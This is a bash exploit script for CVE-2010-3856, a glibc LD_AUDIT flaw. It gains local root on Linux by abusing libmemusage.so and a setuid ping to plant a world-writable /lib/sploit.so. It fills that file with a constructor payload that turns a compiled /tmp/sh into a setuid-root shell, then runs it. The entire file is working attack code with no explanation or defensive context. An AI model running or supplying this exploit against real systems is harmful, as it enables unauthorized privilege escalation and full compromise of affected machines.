CVE-2010-3856.sh

#!/bin/bash
# CVE-2010-3856
# set umask 0 for world writeable files
umask 0
# drop sh.c
cat > /tmp/sh.c << EOF
#include <unistd.h>
#include <stdio.h>
int main (int argc, char **argv, char **envp)
{
  char *args[] = { "/bin/sh", NULL };
  setuid(0);//  setuid(geteuid());
  setgid(0);//  setgid(getegid());
  seteuid(0);
//  setreuid(0);
  execve(args[0], args, envp);
  perror("execve failed");
  return 0;
}
EOF
gcc /tmp/sh.c -o /tmp/sh
cat > /tmp/payload.c << EOF
void __attribute__((constructor)) init()
{
    unlink("/lib/sploit.so");
    setuid(0);
    setgid(0);
    chown("/tmp/sh", 0, 0);
    chmod("/tmp/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
    return 0;
}
EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/sploit.so" ping 2>/dev/null
# Filling the lib file with lib contents
cat /tmp/exploit > /lib/sploit.so
rm /tmp/payload.c /tmp/exploit
# Executing payload..
LD_AUDIT="sploit.so" ping
/tmp/sh